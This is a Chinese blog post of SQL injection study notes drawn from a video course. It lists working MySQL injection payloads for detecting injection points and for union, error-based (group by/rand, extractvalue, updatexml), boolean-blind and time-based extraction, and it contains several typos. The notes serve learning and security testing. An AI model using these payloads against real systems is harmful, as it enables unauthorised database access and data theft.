SQL注入

最新推荐文章于 2022-08-10 22:14:10 发布
最新推荐文章于 2022-08-10 22:14:10 发布
阅读量102 收藏
点赞数
分类专栏: SQL 文章标签: sql
原文链接:https://www.bilibili.com/video/BV1i7411G7vm?p=240
版权

SQL注入

?id= 35 +1/-1
select * from tbName where id=$id
?id= 35’ 字符型 或者是数字型
select * from tbName where id=35’
报错信息有35就是字符型,没有35就是数字型

测试页面是否有布尔类型的状态
?id=35 and 1=1
?id=35 and 1=2

?id=35 and sleep(5) 是否延迟

联合查询 union select语句 两条select
select~~~~~~~ union select ~~~~~~
数据类型要相同 相同的列数

报错注入 在诸如点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中们就可进行报错注入
报错注入的原理,就是在显示西南西中进行SQL语句。

**公式:*group by报错:
?id = 33 and (select 1 from (select count(),cancat((select version() from information_schema.tables limit 0,1),floor(rand()*2)x from information_schema.tables group by x)a) --+
要查询的东西放到concat后面第一个参数,即from前面

报错注入:select concat(left(rand(),3),’^’,(select version()),’^’) as x,count(*) from information_schema.tables group by x;

如果关键表被禁用:
select concat(’’,version(),’’,floor(rand()2))x,count() from (select 1 union select null union select !1)a group by x;

如果rand count被禁用 可以采取以下方式
select min(@a:=1) from information_schema.tables group by concat (’’,@@version,’’,@a:=(@a+1)%2);

不依赖额外的函数和具体的表
select min(@a:=1) from(select 1 union select null union select !1)a group by concat(’’,@@version,’’,@a:=(@a+1)%2);

XPATH报错:
@ extractalue()
?id=33 and extractvalue(1,concat(’^’,(select version()),’^’)) --+
@ updatexml()
?id=33 and updatexml(1,concat(’^’,(select database()),’^’),1) --+

布尔盲注:
?id=33 and length(database())=1 --+

延时注入:
sleep()语句
if(=,seleep(~),1)

口诀(前提sql漏洞存在)
是否有回显 联合查询
没有回回显看是否有报错 报错输入
是否有布尔类型状态 布尔盲注
都没有 延时注入

造成SQL注入漏洞原因:
1、拼接
2、过滤

a tale of a tub
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9287
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入中无法利用information_schema的情况
qq_43936524的博客
05-14 2313
文章目录获得表名sys.schema_auto_increment_columns统计信息相关视图mysql库join报错得到列名sqlmap的处理 从之前的sqlmap盲注溯源的payload中可以看出,在通过database()获得数据库名后,进一步爆出数据基本都利用了information_schema这个系统库来获得,所以自然就想到假如Waf禁止了这个系统库的使用,该怎么爆出数据呢。 查阅资料后发现有其他的几个系统自带的表中也可以获得想要的信息。 获得表名 sys.schema_auto_incre
sql注入information_schema代替,无列名注入之[SWPU2019]Web11
qq_58970968的博客
08-10 845
的时候,有时候information_schema这个库可能会因为过滤而无法调用,这时我们就不能通过这个库来查出表名和列名。但是上述两种方法都只能查出表名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。但是mysql.innodb_table_stats只查到表名,所以不知道列名;information_schema可以查到所有的数据库和表名和列名;当or 被过滤时不能使用information_schema;这道题过滤了空格,用/**/绕过;...
Background-2 盲注的讲解
lixiangminghate的专栏
06-23 253
转自:lcarmy何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从background-1中,我们可以知道盲注分为三类•基于布尔SQL盲注•基于时间的SQL盲注•基于报错的SQL盲注Ps:知识点太多了,这里只能简单列出来大致讲解一下。(ps:每当看到前辈的奇淫技巧的payload时,能想象...
SQL注入:3、无权读取information_schema库和拒绝union、order by语句
千寻瀑
03-19 531
3、无权读取information_schema库和拒绝union、order by语句information_schema:3、 information_schema: 想要查询这张表,必须是root账户,所以他的限制就会很多,所以这种方法一般是不可行的 3、 猜测列名: 输入:'and abc is null – 输入:'and user is null – 无结果,说明在表中存在这样的...
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
groovy怎样从sql语句中截取表名_sql注入mysql
weixin_39653078的博客
11-28 176
SQL注入__0x01♛Sql注入原理Sql注入顾名思义是没有对用户输入的参数进行过滤导致测试者可以将一段非正常语句插入到查询语句中,由web应用带入到数据库中执行,从而读取数据库中的数据。__0x02♛Sql注入利用条件:☀攻击者可以控制传入的参数。☀参数被带入数据库中执行。__0x03♛注入点判断数字型:例:原后台文件的查询语句为:Select * from tables whe...
Mysql注入学习笔记
xj28555的博客
06-25 2056
MYSQL注入 函数 version()——MySQL 版本 user()——数据库用户名 database()——数据库名 @@datadir——数据库路径 @@version_compile_os——操作系统版本 information_schema 自带数据库 information_schema.schemata 数据库 information_schema.tables 数据表 information_schema.columns 数据列 floor函数返回小于等于该值的最大整数 RAND()
mysql注入 显错模式 不显 错误_MySQL显错注入
weixin_39575565的博客
01-19 76
一,updatexml函数函数简介xml_target xml文档片段xpath_expr 匹配修改内容的Xpath表达式new_xml 新的xml片段该函数将XML标记xml_target的给定片段的单个部分替换为新的XML片段new_xml,然后返回更改后的XML。被替换的xml_target部分与用户提供的XPath表达式xpath_expr匹配。说白了,...
Get Offer —— 渗透测试岗试题汇总(Web相关知识点)
Boom!脑洞大爆炸的博客
07-21 5467
一篇文章了解Web知识点
select a,@a:=@a+1 rn from c, (select @a:=0) as a; 的理解
吟游诗人——吟唱生命的不朽
01-08 7663
进来在用《MySQL技术内幕——SQL编程》重温mysql的知识,在第58页见到标题所示代码,顿时有点懵逼,但是经过思考,发现这还是相当简单的。 再把代码放一遍 select a,@a:=@a+1 rn from c, (select @a:=0) as a; 运行截图如下: 看起来完全不知所云,但这其实就是两个表联合查询! 聪明的读者看到这儿应该能自己想出来了,但是不会也没关系,下面我来细细...
SQL注入基础
weixin_45427676的博客
10-21 836
文章目录SQL注入简介基本类型一、union注入(Less-1)(1)基础知识(2)注入过程1、判断是否存在注入2、判断字段3、判断回显位4、查询数据库5、查询表名6、查询表中的列7、查询用户及密码二、boolean注入(Less-8)(1)基础知识(2)注入过程 SQL注入简介 通过把SQL命令插入到Web表单或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,SQL注入目前黑客
SQL注入学习
qq_41007744的博客
05-01 680
字符串连接函数1. concat(str1,str2,...)连接参数产生的字符串。select concat(id,',',name) as con from info limit 1;2. group_concat(str1,str2,...)连接一个组所有的字符串,以逗号分割。3. concat_ws(separator,str1,str2,...)<br>含有分割符的连接字符串...
SQL盲注注入——布尔型
热门推荐
weixin_40709439的博客
08-03 4万+
盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语...
SQL注入-1
qq_36567469的博客
03-19 3817
SQL注入
postman sql注入
最新发布
01-04
如果响应中包含SQL语法错误或其他与SQL注入相关的错误信息,那么说明存在SQL注入漏洞。 需要注意的是,Postman只是用于测试和验证API的工具,并不能直接修复或防止SQL注入漏洞。要修复和防止SQL注入漏洞,需要在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值